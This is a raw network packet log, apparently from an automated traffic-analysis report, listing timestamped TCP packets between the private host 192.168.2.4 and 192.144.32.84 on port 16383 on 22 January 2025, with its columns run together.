                                                                                                                Jan 22, 2025 04:12:10.330197096 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330207109 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330224991 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330233097 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330245972 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330262899 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330276966 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330312967 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330333948 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330344915 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330348969 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330400944 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330423117 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330434084 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330481052 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330488920 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330499887 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330507994 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330517054 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330535889 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330544949 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330553055 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330554962 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330564022 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330578089 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330588102 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330609083 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330619097 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330627918 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330632925 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330637932 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330658913 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330670118 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330681086 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330688953 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330696106 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330701113 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330744982 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330765963 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330766916 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330792904 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330812931 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330837011 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330842018 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330847979 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330872059 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330881119 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330893040 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330903053 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330913067 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330924034 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330929995 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330933094 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330940962 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330950975 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330960989 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.330977917 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.330991030 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331001043 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331012964 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331029892 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331041098 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331044912 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331072092 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331083059 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331099033 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331127882 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331131935 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331139088 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331165075 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331176043 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331188917 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331196070 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331207037 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331238031 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331269026 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331279039 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331279993 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331299067 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331307888 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331329107 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331363916 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331412077 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331423044 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331439972 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331455946 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331459045 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331470013 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331497908 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331499100 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:10.331509113 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331517935 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331537008 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331546068 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331554890 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331563950 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331571102 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331588984 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331598997 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331629038 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331638098 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331691027 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331700087 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331703901 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331712961 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331732988 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331742048 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331799030 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331809044 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331849098 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331859112 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331902981 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.331912994 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:10.375818968 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.159625053 CET1638349733192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.162343979 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.167397976 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.167496920 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.168447018 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.173316956 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.206667900 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.519715071 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.524833918 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.524853945 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.524880886 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.524893999 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.524908066 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.524921894 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.524935007 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.525072098 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.525145054 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.525158882 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.525172949 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.525224924 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.525269032 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.530961990 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.530983925 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531063080 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531076908 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531091928 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531105995 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531177998 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531191111 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531198978 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.531328917 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.531372070 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531384945 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531399965 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531413078 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531426907 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.531626940 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.537738085 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.537792921 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.537852049 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.537882090 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.537894964 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.537987947 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.538053989 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538069010 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538081884 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538096905 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538121939 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538130045 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.538137913 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538181067 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.538220882 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.538300991 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538314104 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538326979 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538340092 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538352013 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538364887 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538391113 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538403988 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538503885 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538505077 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.538516998 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538547039 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538561106 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538573980 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538588047 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538615942 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538629055 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538645029 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.538645983 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.538698912 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.538728952 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.542959929 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.542973042 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543029070 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543059111 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543267012 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543288946 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543308020 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543358088 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543373108 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543386936 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543417931 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543435097 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543450117 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543463945 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543478966 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543481112 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543494940 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543520927 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543534994 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543551922 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543567896 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543581963 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543595076 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543626070 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543628931 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543638945 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543653011 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543664932 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543678045 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543687105 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543693066 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543709040 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543723106 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543747902 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543768883 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543781996 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543792009 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543793917 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543807983 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543826103 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543852091 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543865919 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543893099 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543905020 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543905973 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543917894 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.543973923 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.543991089 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544004917 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544017076 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544028997 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544043064 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544054985 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544065952 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544080019 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544094086 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544116974 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544128895 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544131041 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544143915 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544157028 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544176102 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544182062 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544195890 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544214010 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544222116 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544234991 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544245005 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544248104 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544261932 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544279099 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544290066 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544306040 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544320107 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544331074 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544331074 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544375896 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544378042 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544392109 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544416904 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544430017 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544456005 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544456959 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544470072 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544481993 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544491053 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.544495106 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.544560909 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.545260906 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.545274973 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.545295000 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.545306921 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.545341969 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.545389891 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.549345016 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.549359083 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.549370050 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.549381971 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.549393892 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.549407005 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.549427032 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.549494028 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.549629927 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.549642086 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.549806118 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.550440073 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.550452948 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.550465107 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.550497055 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.550556898 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.550976992 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.550991058 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551002979 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551018000 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551031113 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.551075935 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551080942 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.551089048 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551136017 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.551182985 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551196098 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551208019 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551239014 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551250935 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.551258087 CET4973416383192.168.2.4192.144.32.84
